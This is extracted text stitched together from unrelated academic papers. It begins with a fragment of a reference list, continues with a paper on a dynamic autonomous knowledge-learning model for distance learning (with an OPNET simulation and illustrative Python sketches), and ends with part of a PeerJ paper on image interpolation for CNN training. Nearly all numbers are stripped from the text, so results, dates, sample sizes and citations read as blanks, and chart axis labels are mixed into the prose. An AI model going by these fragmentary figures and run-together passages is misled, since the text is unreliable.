méndez a. . local, domestic and international scientific collaboration in biomedical research. scientometrics ( ): – doi . /bf . cai q, gong m, ma l, ruan s, yuan f, jiao l. . greedy discrete particle swarm optimization for large-scale social network clustering. information sciences : – doi . /j.ins. . . . ding c, he x. . k-means clustering via principal component analysis. in: proceedings of the twenty-first international conference on machine learning. banff, alberta: acm, . du n, wu b, pei x, wang b, xu l. . community detection in large-scale social networks. in: proceedings of the th webkdd and st sna-kdd workshop on web mining and social network analysis. new york: acm, – . girvan m, newman me. . community structure in social and biological networks. proceedings of the national academy of sciences of the united states of america ( ): – . gong m, ma l, zhang q, jiao l. . community detection in networks by using multiobjective evolutionary algorithm with decomposition. physica a: statistical mechanics and its applications ( ): – doi . /j.physa. . . . halkidi m, batistakis y, vazirgiannis m. . clustering validity checking methods: part ii. acm sigmod record ( ): – doi . / . . khan s, liu x, shakil ka, alam m. . a survey on scholarly data: from big data perspective. information processing & management ( ): – doi . /j.ipm. . . . koll d, li j, fu x. . with a little help from my friends: replica placement in decentralized online social networks. technical report tr-ifi-tb- - , university of goettingen, germany. feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://snap.stanford.edu/data/ego-facebook.html http://snap.stanford.edu/data/gemsec-deezer.html http://snap.stanford.edu/data/gemsec-deezer.html https://github.com/yffre/comics http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . /sg- - - http://dx.doi.org/ . /science.aad http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.ipm. . . http://dx.doi.org/ . /peerj-cs. 
International Conference on Sensor Network and Computer Engineering (ICSNCE)

Advanced Dynamic Autonomous Knowledge Learning Method for Distance Learning

Yanfang Fu, Xing Li, Xueyao Feng, Jing Ma
School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China
E-mail: @qq.com

Abstract—Information is now produced and transmitted at an unprecedented rate, and traditional instruction can no longer meet the needs of open and lifelong learning, so how distance learning can support study has become a question worth examining. Distance learning needs better interactivity and learner initiative so that instruction can be adapted to each learner's aptitude. When learners work with data in a variety of formats and hold the initiative in the learning process, they are less likely to drift away from their learning goals. To this end, we build on ILTMK theory and distributed interactive technology, introduce active-learning factors, propose a dynamic autonomous knowledge learning model, and construct a simulation environment and the related mechanisms for it. Simulation experiments verify the effectiveness of the proposed autonomous learning method.

Keywords—distance learning; ILTMK theory; distributed interactive technology; dynamic autonomous knowledge learning model

I. Introduction

From the standpoint of the source of knowledge, knowledge is the knower's grasp of the essence of things through phenomena. The bystander view of knowledge, which derives from the ancient Greek natural philosophers and was held by Socrates and others, led to "reception learning" dominating human learning for a long period [ - ]. In China, the participant view of knowledge underlying basic education reform is "inquiry learning". The history of educational practice shows that only when the participant view of knowledge replaces the bystander view can inquiry learning replace reception learning. Knowledge contains a personal factor: the process of acquiring knowledge is the learner's participation in constructing it. John Dewey explained the participant view of knowledge as the interaction of the human and the environment [ ]. Inquiry learning focuses not only on the participant's personal experience of the process but even more on personal understanding [ ].

With the popularity of the Internet, distance learning has moved from letter-based and broadcast-television "receiving learning" toward network-based "research study" (for example, Baidu Library and Blackboard). Distance learning complements a new model of independent study. Some intelligent distance-learning systems now add chat rooms, electronic whiteboards, virtual classrooms, and other functions to improve the learning effect, but these only support the learning environment; they do not achieve a teaching mode customized to the learner's active learning. Existing models are commonly based on agent technology or on ILTMK (the intelligent long-distance teaching model based on knowledge) [ ]. However, at present most distance-learning models amount to simple, individual information-sharing styles of learning.
They have merely solved how to use Internet technology so that geographically separated groups can share learning materials; learners remain in a passive learning mode. So far, no one is satisfied with existing distance-learning models [ ]. If learners can interact through active learning, distance learning can produce good results. With the rapid development of information technology, especially network and communication technology, distance learning can help us improve our knowledge rapidly [ ]. How to establish an interactive mode between the learner and the knowledge grantor therefore plays an important role in research and innovation.

II. Relevant Theories of Distance Learning

To make full use of the knowledge resources on the network, we must adopt a deeper sharing strategy centered on knowledge sharing, or knowledge-unit sharing [ ]. A knowledge unit, or learning object (LO), is relatively independent and stands for one element of knowledge; knowledge can be hierarchical and nested, and each unit carries its own descriptive metadata. An LO can be divided into two parts, namely metadata and content data. The metadata section describes the characteristics of the LO, while the content data part gives the knowledge and information that the LO represents. To realize intelligent reasoning in the system, we use a production system to represent knowledge and information [ ]. We choose this representation because it has many advantages, in particular ease of understanding, availability, and manageability; moreover, most of today's intelligent applications adopt this kind of knowledge representation. A production system contains a set of productions (production rules) and facts. Production rules use an if-then form to express knowledge, and "attribute/value" pairs are used to express the facts. A production rule has the following form:

if (<condition 1> <condition 2> ... <condition n>) then (<conclusion 1> <conclusion 2> ... <conclusion n>)

When the conditions are satisfied, the data are operated on in the order given by the conclusions. The form of an LO in a production can be a constant, a variable, a unit group, or a tree (Fig. ); a short illustrative sketch of this rule format follows.
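The paper gives no implementation of this rule format; the following is a minimal, illustrative Python sketch of a production system over attribute/value facts. The Rule class, the forward_chain helper, and the example rules and attribute names are invented for this illustration and are not part of the original system.

```python
# Illustrative sketch of a tiny production system over attribute/value facts.
# The rule contents and helper names here are invented for illustration only.

class Rule:
    def __init__(self, conditions, conclusions):
        self.conditions = conditions      # list of (attribute, value) pairs that must hold
        self.conclusions = conclusions    # list of (attribute, value) pairs asserted when fired

    def matches(self, facts):
        return all(facts.get(attr) == val for attr, val in self.conditions)


def forward_chain(rules, facts):
    """Repeatedly fire rules whose conditions hold until no new facts appear."""
    changed = True
    while changed:
        changed = False
        for rule in rules:
            if rule.matches(facts):
                for attr, val in rule.conclusions:
                    if facts.get(attr) != val:
                        facts[attr] = val
                        changed = True
    return facts


# Example: hypothetical rules recommending the next learning object (LO).
rules = [
    Rule(conditions=[("topic", "networks"), ("level", "beginner")],
         conclusions=[("next_lo", "intro_to_tcp")]),
    Rule(conditions=[("next_lo", "intro_to_tcp")],
         conclusions=[("media", "video")]),
]
facts = {"topic": "networks", "level": "beginner"}
print(forward_chain(rules, facts))   # adds next_lo='intro_to_tcp' and media='video'
```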
III. Learning Model Based on Interaction

A. Characteristics of the Active Distance-Learning Model

The design of a remote active-learning model should have the following characteristic elements. (1) Boundary and exclusivity: the personnel composition of a learning subject is clear, and whether or not someone studies the subject must be identifiable. (2) Purpose: a learning subject exists for a certain purpose, namely the learning interaction of sharing some knowledge. (3) Rules: each member must abide by a certain interactive code of conduct. (4) Obligations: in the learning process, each knowledge sender bears a certain teaching responsibility. (5) Independence: every member can make choices according to their own rights and awareness.

The concept of "interaction" first appeared in communication studies and sociology. In sociology, interaction is defined as the ways and processes of mutual influence and effect produced between people and groups; "interaction" dynamically expresses a person's social relations, and many complicated social phenomena are caused by it. When we consider interaction in the field of communication [ ], we find that it focuses more on the flow and exchange of study information, or on the relationships among the transmission elements.

Simple "teaching" or "learning" in distance learning rarely reaches the expected goals; the entire learning process should be placed within "relationship" and "interaction" so that the goals can be better achieved. Interaction therefore stands out in the virtual learning community. In the learning process, we call the interaction produced when learners interact with others, or with their teachers, through the Internet the interactive spread [ ]. Because of the nature of distance education, teachers and students are often in different locations, and time and space are relatively separated throughout the teaching process; purposefulness and bilaterality are therefore very pronounced in the transmission of teaching, and interaction becomes all the more important. Interactive communication that is not free often makes it harder for learners to improve themselves.

The knowledge-learning process can thus be partitioned into several periodic interactive learning topics. Each topic is further divided into several pieces of learning content, for which learners send requests to the knowledge giver. When the subject and synchronization-time conditions are satisfied, the knowledge giver can receive the request signals of each learner separately, without confusion. Meanwhile, the knowledge that the giver sends to multiple learners is sequentially arranged and taught within specific time slots; each learner only needs to receive it within the specified time, so that learners can distinguish their own topic from the rest of the stream and record it. In a distance-learning network, no single knowledge giver can master all knowledge; a giver also needs to learn from other givers in the virtual network. When two or more knowledge givers send knowledge data on the same subject at the same time, or send data to the same learner, a conflict occurs, so the time of knowledge interaction must be scheduled.

B. Autonomous Learning Measurement Method

Facing knowledge-interaction scheduling, we first give two definitions:
• In the network, each learner has at least one interactive subject in a scheduling cycle.
• A learner cannot receive knowledge and send new knowledge at the same time, and cannot receive more than one knowledge interaction at a time.

Each participant is a learner for certain knowledge subjects but can sometimes also act as a knowledge giver, which increases the complexity of the system model. The problem of scheduling knowledge interaction is therefore to assign knowledge content to learning objects according to the different subjects [ ]. According to their interest in the knowledge content, participants can be divided into two groups: learners and grantors. Assume the interests in the entire network are a1, a2, ..., an and the knowledge content is divided into l1, l2, ..., lm. We can view the network as a graph G(V, E), in which a node v (v = 1, 2, ..., n) stands for a knowledge interest, n is the number of interests, and the edge set E is the collection of possible interactions.
When nodes i and j can interact with each other, there is an undirected edge e_ij between them, e_ij ∈ E, and nodes i and j are one-hop neighbors (a learner and a knowledge giver of the same content). If nodes i and j cannot communicate directly, they do not share the same knowledge content; a knowledge giver for that content must be found, and the interaction can only take place through an intermediate node k, i.e., there exist edges e_ik and e_kj, so nodes i and j are two-hop neighbors.

The network can be described by a symmetric binary n × n adjacency matrix C = [c_ij] (i, j = 1, 2, ..., n), where

c_ij = 1 if nodes i and j share an edge, and c_ij = 0 otherwise.

A second n × n matrix D = [d_ij] (i, j = 1, 2, ..., n) marks two-hop neighbors:

d_ij = 1 if nodes i and j are two-hop neighbors, and d_ij = 0 otherwise.

Considering that nodes more than two hops apart can reuse the same slot (spatial reuse), the optimal autonomous learning model can be obtained. The network has M pieces of knowledge content, described by an M × n binary matrix T = [t_mi]:

t_mi = 1 if knowledge content m is assigned to learner i, and t_mi = 0 otherwise.

The interactive rate of learner i is the fraction of knowledge topics assigned to that learner,

η_i = (Σ_m t_mi) / M,

and the interactive rate of the entire network is

η = (1/n) Σ_i η_i = (1 / (M n)) Σ_i Σ_m t_mi.

By the two definitions above, two learners may send knowledge-data requests at the same time only if they are separated by more than two hops. The scheduling problem can therefore be summarized as the following model:

minimize M and maximize η, subject to
C1: Σ_m t_mi ≥ 1 for every learner i ∈ [1, n] (each learner is assigned at least one content per cycle);
C2: c_ij · t_mi · t_mj = 0 for all i, j ∈ [1, n] and m ∈ [1, M] (one-hop neighbors are never assigned the same content slot simultaneously);
C3: c_ik · c_jk · t_mi · t_mj = 0 for all i, j, k ∈ [1, n] and m ∈ [1, M] (nodes with a common neighbor k, i.e., two-hop neighbors, are never assigned the same content slot simultaneously).

The main idea of the interactive process is as follows: each learner interacts with the knowledge giver at the fixed knowledge-content point and in chronological order, provided they share a common learning subject. A learner's active behavior allows the learner to obtain more study time; if no learning behavior releases the study time, the knowledge giver's interaction slot remains free, and another learner whose initiative is more active and who has not yet studied enough can use this free time to improve further.
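The scheduling model above is stated only as formulas; the following standalone Python sketch shows how the matrices C, D and T and the interactive rate η fit together, with a brute-force check of constraints C1-C3 on a toy five-node network. The network, the hand-made assignment T, and all numbers are invented for illustration; this is not the paper's scheduling algorithm.

```python
import numpy as np

# Toy network: 5 nodes on a path, edges are one-hop neighbor pairs (illustrative only).
n, M = 5, 3
edges = [(0, 1), (1, 2), (2, 3), (3, 4)]

C = np.zeros((n, n), dtype=int)                    # one-hop adjacency matrix  c_ij
for i, j in edges:
    C[i, j] = C[j, i] = 1

D = ((C @ C) > 0).astype(int) * (C == 0)           # two-hop matrix d_ij: common neighbor, no direct edge
np.fill_diagonal(D, 0)

# T[m, i] = 1 if knowledge content m is assigned to learner i in this scheduling cycle.
T = np.array([[1, 0, 0, 1, 0],
              [0, 1, 0, 0, 1],
              [0, 0, 1, 0, 0]])

def feasible(C, D, T):
    """C1: every learner gets at least one content; C2/C3: no one- or two-hop pair shares a slot."""
    if not np.all(T.sum(axis=0) >= 1):             # C1
        return False
    conflict = (C + D) > 0                         # pairs that may not be scheduled together
    for row in T:                                  # each knowledge content / slot
        assigned = np.flatnonzero(row)
        for a_idx, i in enumerate(assigned):
            for j in assigned[a_idx + 1:]:
                if conflict[i, j]:                 # violates C2 or C3
                    return False
    return True

eta = T.sum() / (M * n)                            # network interactive rate
print("feasible:", feasible(C, D, T), "interactive rate:", round(eta, 3))
```

In the paper this assignment T would be produced by the interaction-scheduling procedure itself; it is fixed by hand here only to make the quantities concrete.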
IV. Building the Simulation Model in OPNET

Data packets in OPNET consist of one or more fields; the packet format editor is used to define the packet format, and each field of a packet has a name, a size (in bits), a color, a type, and a default value. The graphical editor displays each field of the packet directly, and the size of a field exactly reflects its bit length in the packet. We designed three different types of data packets for the three types of data exchanged: knowledge-content data packets, active-application (request) packets, and knowledge-giver reply packets.

Figure . Learners process model

The learner process model mainly includes the following states (Fig. ), whose functions are as follows:

• Init state: this state initializes the simulation data. The initialized objects mainly include the active-interaction time slice, the interaction time, the number of knowledge subjects, the number of knowledge contents, etc. After the initialization of an object is completed, the interrupt function op_intrpt_schedule_self(op_sim_time(), ) is called, which causes the process to move from the interruption produced at the current time to the request state, where only the interrupt type is judged.

• Idle state: a free waiting state. After executing their exit code, all states return to this state to wait for the conditions for the next transition. The exit code of this state determines the current simulation interrupt type, assigns it to the variable current_intrpt_type, and then decides, according to that type, whether the current node's interactive interrupt is produced. If so, the process turns to the request state or the tx state to send a request packet or a data packet.

• fr_rx state: responsible for identifying the type of the data packets arriving from the network receiver. It extracts the corresponding information from the ack_data field and judges whether the current node's interaction request succeeded. If it did, the state extracts the knowledge-content information contained in the ack_data field of the packet and sets the if_need_request flag to indicate success, so there is no need to send another request packet; the process then cycles through the idle, fr_rx, tx and fr_src_ states, and the knowledge giver sends knowledge in the assigned time slices until the data queue is empty.

• fr_src_ state: the condition for moving from the idle state to this state is that the source module in the node model generates a packet and the node has not yet been assigned an interaction time slice.

• Request state: this state is mainly responsible for calculating the position of the current active request's time slice and determining whether the node's own interaction time has begun. If it has, the state fills in the field information and then sends the knowledge content; if the node is not yet in its time slice, or the current time slice has already passed its clock, the state computes the next arrival time (in absolute simulation time) and sets an interrupt at that time.

• fr_src_ state: similar in function to the previous fr_src_ state, it fills in each field of the data packet received from the data source and inserts it into the queue. The difference is that, when the data source produces a packet, this state can only be entered from idle if the node's request for a time slice has already succeeded.

• tx state: when the node's request queue is not empty, data are sent in this time slot. If a data packet exists in the queue, the node must send an interaction request packet to the knowledge giver, apply for a number of time slices, and use them to send data from the queue. At this stage the process jumps among the four states idle, fr_rx, fr_src_ and request. After the request succeeds, each frame of data waits for its own time slot to be sent; the process then cycles among idle, fr_rx, fr_src_ and tx, judging the time slice and sending the queued data, until the simulation is closed.

V. Simulation Experiment

The scale of the simulated population is about people (Fig. ). The learners are set to the same request rate (the request interval is drawn from a negative exponential distribution), and the knowledge givers interact with learners at the same rate.
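The OPNET process model itself cannot be reproduced here; the following standalone Python sketch only illustrates the traffic assumption stated above (negative-exponential request intervals per learner). The rate, cycle length, learner count, and seed are invented example values, not the paper's parameters.

```python
import random

RATE = 0.2          # one request every 5 time units per learner, on average (example value)
CYCLE = 50.0        # length of one scheduling cycle in time units (example value)
LEARNERS = 10

random.seed(1)

def request_times(rate, horizon):
    """Poisson-process request times on [0, horizon), built from exponential gaps."""
    t, times = 0.0, []
    while True:
        t += random.expovariate(rate)
        if t >= horizon:
            return times
        times.append(t)

per_learner = {i: request_times(RATE, CYCLE) for i in range(LEARNERS)}
total = sum(len(v) for v in per_learner.values())
print(f"{total} requests generated in one cycle "
      f"(expected about {RATE * CYCLE * LEARNERS:.0f})")
```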
A learning subject forms one subnet, and the learners interact with the knowledge giver to complete each piece of content in the study; a learner may also be involved, as a learner, in the subnet of another subject, and a large number of such subnets are nested.

Figure . Modeling of the simulated network level

The diagram shows the knowledge giver of a theme interacting with a large number of students while the learners complete the learning of the knowledge content. From Figure , we can see that the improvement in the new model reflects the active learning behavior of the learners. When the model adopts dynamic autonomous learning, the interactive data sent by learners clearly change dynamically (as shown in Figure ). As can be seen from Figure (b), after learners receive the grantor's knowledge content, their knowledge-acquisition requests change significantly; interestingly, the downward point of the simulated curve is far lower than the rate of the original model, which suggests that the increase in initiative also reduces interest in the learning theme.

Figure . Learners' average interactive rate
Figure . Learners' interactive data sending over time: (a) knowledge acquisition rate; (b) knowledge acquisition request rate

From the above two groups of simulation data we can see that the improved model not only reflects the active learning behavior of learners but also increases the degree to which learners lose interest in some learning content.

VI. Conclusion

Modern distance learning is bound up with knowing individuals; it depends on personal participation and on the learner as knower. The enthusiasm, personal exploration, and personal opinions of the individual are indispensable parts of knowledge. Knowledge itself contains intrinsic personal factors, and the process of acquiring knowledge is the process in which the knower participates in constructing it; Dewey explained the participant view of knowledge as the "interaction" of the human and the environment. Distance learning needs improved interactivity and initiative so that instruction can suit each learner's aptitude; when learners study data in a variety of formats and hold the initiative in the learning process, they are less likely to deviate from their learning goals. To this end, on the basis of ILTMK theory and distributed interactive technology, we introduced active-learning factors, proposed a set of interaction rules for active learning, studied the interaction between learners and the knowledge imparter, and, under the condition of active learning, used the rules generated by the interactive knowledge-subject data to establish a model of autonomous learning. The model focuses not only on the learner's going through the process but, even more, on the learner's experience and on gaining a personalized understanding with learning enthusiasm. The value of this way of learning is that the learner, facing complexity itself, keeps a kind of "seeking" of uncertainty and, in the process of seeking certainty, constructs "personal knowledge" while eagerly pursuing it. The learning process is set up in the simulation software so that the distance-learning programme and the related learning strategy can be determined dynamically, genuinely improving the intelligence and personalization of distance learning.

Acknowledgment

This research was supported by the Industrial Research Project of Shaanxi Science and Technology Department (Nos.
gy- ) and the educational reform fund of xi'an international conference on sensor network and computer engineering (icsnce ) technological university (nos. jgz , jgy , xagdyj ). references [ ] lee b, yoon j,and lee i,“learners’ acceptance of e-learning in south korea: theories and results,” computers & education. rd ed,vol. , ,pp. – . [ ] ahmed h m s. “hybrid e-learning acceptance model: learner perceptions,” decision sciences the journal of innovative education. th ed,vol. , ,pp. – . [ ] ikpeze c h,and boyd f b. “web-based inquiry learning: facilitating thoughtful literacy with webquests,” reading teacher. th ed,vol. , ,pp. – . [ ] maudsley g, williams e m i, and taylor d c m. “problem-based learning at the receiving end: a ‘mixed methods’ study of junior medical students’ perspectives,”advances in health sciences education. th ed,vol. , ,pp. - . [ ] yun l x, sheng z y, and li z s. “intelligent internet long-distance teaching model based on knowledge,”journal of hefei university of technology. ,pp. - . [ ] english t, harrison a l, and hart a l. “a distance learning model in a physical therapy curriculum,” journal of allied health. , pp. . [ ] jenkins j r p c g j m. “special education and the regular education initiative: basic assumptions,” exceptional children. th ed,vol. , ,pp. - . [ ] harjumaa m, and oinas-kukkonen h. “towardsdeeper understanding of persuasion in software and information systems,” international conference on advances in computer-human interaction. ieee computer society, , pp. - . [ ] gellman-danley b, and fetzner m j. “asking the really tough questions: policy issues for distance learning.”online journal of distance learning administration . ,pp. - [ ] qing p, yun x, and shou-hong w.“research and implementation of animation technology on distance teaching courseware,” application research of computers. st ed,vol. , ,pp. - . [ ] boyle t. “design principles for authoring dynamic reusable learning objects,” australian journal of educational technology. th ed,vol. , ,pp. -- . submitted july accepted october published november corresponding author daisuke hirahara, ffieldai@gmail.com academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright hirahara et al. distributed under creative commons cc-by . open access effects of data count and image scaling on deep learning training daisuke hirahara , eichi takaya , taro takahara and takuya ueda department of ai research lab, harada academy, kagoshima, kagoshima, japan school of science for open and environmental systems, graduate school of science and technology, keio university, yokohama, kanagawa, japan department of biological engineering, school of engineering, tokai university, isehara, kanagawa, japan department of clinical imaging, graduate school of medicine, tohoku university, sendai, japan abstract background. deep learning using convolutional neural networks (cnn) has achieved significant results in various fields that use images. deep learning can automatically extract features from data, and cnn extracts image features by convolution processing. we assumed that increasing the image size using interpolation methods would result in an effective feature extraction. to investigate how interpolation methods change as the number of data increases, we examined and compared the effectiveness of data augmentation by inversion or rotation with image augmentation by interpolation when the image data for training were small. 
further, we clarified whether image augmentation by interpolation was useful for cnn training. to examine the usefulness of interpolation methods in medical images, we used a gender data set, which is a sex classification data set, on chest radiographs. for comparison of image enlargement using an interpolation method with data augmentation by inversion and rotation, we examined the results of two- and four-fold enlargement using a bilinear method. results. the average classification accuracy improved by expanding the image size using the interpolation method. the biggest improvement was noted when the number of training data was , and the average classification accuracy of the training model with the original data was . . however, upon increasing the image size by four times using the interpolation method, the average classification accuracy significantly improved to . . compared with the data augmentation by inversion and rotation, the model trained using the bilinear method showed an improvement in the average classification accuracy by . with training data and . with , training data. comparisons of the average classification accuracy of the chest x-ray images showed a stable and high-average classification accuracy using the interpolation method. conclusion. training the cnn by increasing the image size using the interpolation method is a useful method. in the future, we aim to conduct additional verifications using various medical images to further clarify the reason why image size is important. subjects artificial intelligence, data mining and machine learning, data science keywords image scaling, nearest, bilinear, hamming, bicubic, lanczos, medical image, deep learning, fashion-mnist, interpolation how to cite this article hirahara d, takaya e, takahara t, ueda t. . effects of data count and image scaling on deep learning train- ing. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ffieldai@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. introduction a convolutional neural network (cnn) proposed by researchers at the university of toronto at the imagenet large scale visual recognition challenge (hijazi, kumar & rowen, ) had significant impact on society when it achieved an approximately % improvement in error rate compared to previous methods. this technological development has made image classification widely known for its effectiveness, and its applications in the medical field are rapidly advancing (zhou et al., ; kyono, gilbert & van der schaar, ; poplin et al., ), e.g., classification of computed tomography images and mammographs, along with the prediction of cardiovascular risk from retinal fundus photographs. by training a cnn using a large volume image data, identification can be achieved at high accuracy. however, in the medical field though, large volumes of image data are not always available. as a result, when the amount of training data is limited or only small images are available, cnns cannot be trained as designed; thus, they cannot be used to solve problems. generally, if the amount of data is limited when training a machine learning model for image identification, a data augmentation method is employed to mirror or rotate the available image data. various data augmentation methods have been proposed as of june . 
for example, mixup (zhang et al., ) performs augmentation by linearly complementing labels and data to create new data, augmix (hendrycks et al., ) realizes data augmentation by convexly joining multiple randomly sampled operations and their compositions without deviating from the original data while maintaining diversity, and random erasing data augmentation (zhong et al., ) masks random, partial rectangular areas of an image to generate training data. these methods are effective for image classification, object detection, and person identification tasks; however, they are less effective for medical images because new data are generated and mask processing is performed. this is due to the fact that if the medical image is randomly cropped or masked, the lesion is hidden and frequently disappears in the true image. images of the human body have structures that originally have a fixed position of existence. for example, the liver is always on the right side of the body, and the heart is always on the left side. therefore, even recent data augmentation methods (mixup, augmix, and random erasing data augmentation) with right-to-left inversion or rotation may not improve the robustness of analysis for the human body images. it’s worth noting that several studies are currently investigating high-accuracy identification with a small amount of data using various methods, e.g., transfer learning and multi-scale cnns (bakkouri & afdel, ; samanta et al., ). in these methods, data augmentation is performed by degrading the image with a fixed number of pixels or by degrading the high-resolution image. however, studies using medical images often require the use of only a portion of the image. this can happen when we use ct images in the study for the lymph node. although the original resolution of ct is enough ( × ), the data size around the lymph nodes can only be a few tens of pixels, thereby causing low resolution. in addition, when hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure cnn structure. fh, input height, fw, input width, oh, output height, ow, output width, p, padding, s, stride; kernel size= , stride= , padding= , dropout= . . full-size doi: . /peerjcs. /fig- nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- anatomically small tissues are made into an object, an image cut out from a diagnostic image may be used. in such cases, only low-resolution image are available. thus, in this paper, we investigated the effectiveness of using low-resolution image data processed by a pixel interpolation method as training data. hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. 
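As a concrete illustration of the mixup operation mentioned earlier in this section, here is a minimal sketch (an independent toy re-implementation, not the authors' code or the reference implementation): a mixing coefficient λ is drawn from a Beta(α, α) distribution and each image and its one-hot label are linearly combined with a shuffled partner. The batch shape, α value, and seed are arbitrary example choices.

```python
import numpy as np

rng = np.random.default_rng(0)

def mixup_batch(x, y, alpha=0.2):
    """Mix a batch with a shuffled copy of itself: x' = lam*x + (1-lam)*x[perm]."""
    lam = rng.beta(alpha, alpha)               # mixing coefficient, lambda ~ Beta(alpha, alpha)
    perm = rng.permutation(len(x))
    x_mixed = lam * x + (1.0 - lam) * x[perm]
    y_mixed = lam * y + (1.0 - lam) * y[perm]  # labels must be one-hot / soft for this to make sense
    return x_mixed, y_mixed, lam

# Toy batch: four 28x28 "images" with one-hot labels over 10 classes.
x = rng.random((4, 28, 28))
y = np.eye(10)[[0, 3, 3, 7]]
x_m, y_m, lam = mixup_batch(x, y)
print("lambda =", round(float(lam), 3), "| mixed label of sample 0:", np.round(y_m[0], 2))
```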
/fig- cnn is a convolution process extracting features that fit the convolution kernel. convolution kernel sizes of × and × are commonly used. if the image data input to the cnn is small, the necessary features may not be extracted. therefore, we increased the input image data size using the interpolation method. in this paper, we reveal the impact of different pixel interpolation methods on model training, such as training models on low-resolution image data or training models on medical images that are cropped for the necessary part of the image. materials & methods in this study, the fashion-mnist dataset (xiao, rasul & vollgraf, ) was used to verify improvements in average classification accuracy. the fashion-mnist dataset contains fashion images and is unbiased because all classes are equal. note that monochrome images are often used in image diagnosis, and this dataset has similar features. in addition, the image size in the dataset is × pixels. after examining the fashion-mnist dataset, we used the gender data set, which predicts gender from chest radiographs published in the minijsrt_database, as a medical hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- image dataset (shiraishi et al., ). the image size in this dataset is × pixels, and there are and images of men and women, respectively. moreover, python . was used as the programming language, pytorch (version . . ) was used as the deep learning framework, and google colaboratory was utilized for the environment. as a deep learning model, we created and trained the cnn model. the structure of the created cnn model is shown in fig. . herein, the mini-batch method was used to train the cnn model. the training parameters included the following: the batch_size was , epochs were , adam’s method was used for optimization, and mean square error was used for loss function. we used the rectified linear unit as the activation function. the number of channels must be determined arbitrarily, and the kernel size, stride, and padding were common to all convolutional layers. dropout was applicable to dense and dense . the image data interpolation method used as input to cnn was the image processing library for python pillow’s five pixel interpolation methods (nearest (lehmann, gonner & spitzer, ), bilinear (lehmann, gonner & spitzer, ), hamming (harris, ), bicubic (keys, ), and lanczos (duchon, )). the nearest neighbor refers to and interpolates the brightness value of the pixel nearest to the reference position. in bilinear, luminance values are linearly interpolated using × pixels ( pixels) hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with , training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. 
/fig- in the vicinity of the position (x,y) to obtain luminance values and interpolate them. in bicubic, luminance values are obtained and interpolated by interpolating luminance values with a cubic formula using × pixels ( pixels) around the calculated position (x,y). hamming and lanczos are window functions, which, along with the han window, are among the most commonly used window functions. it has a better frequency resolution and a narrower dynamic range than the han window. characterized by discontinuities at both ends of the interval, the lanczos window is one of the many finite support approximations of the sinc filter. each interpolation value is a weighted sum of two consecutive input samples. for additional details about each method, refer to pillow’s documentation and original papers (lehmann, gonner & spitzer, ; harris, ; keys, ; duchon, ). in the fashion-mnist dataset investigation, the total number of coupling layers in the cnn was changed from to , when image interpolation was doubled and , when it was quadrupled. here, a small subset of images ( , , , , , , , , and , ) was constructed from , images such that the number of images per class was uniform. then, classification accuracy was obtained by identifying , images used as test data. the training and evaluation processed were each performed times. hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with , training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- in addition, it was compared with a conventional image data augmentation method, i.e., rotation and inversion. here, horizontal inversion and rotation of ± ◦ were applied randomly to a group of training images, and the training and evaluation processes were each performed times. for the gender dataset, the image size was reduced to × pixels by resizing. here, considering an image as an input to the training model, the number of fully-connected layers was changed from to , on doubling the resolution using five different pillow’s pixel interpolation methods and from to , on quadrupling the resolution. the gender dataset was examined with ten-fold cross-validation because the total number of datasets was only . results figure shows the results of training using pieces of data processed using the five image interpolation methods. with a mean classification accuracy of . for the training model in the source image, in which the image size was not expanded by the interpolation method, the average classification accuracy was improved for all models trained with image enlargement data using the pixel interpolation method. the method that most improved the hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . 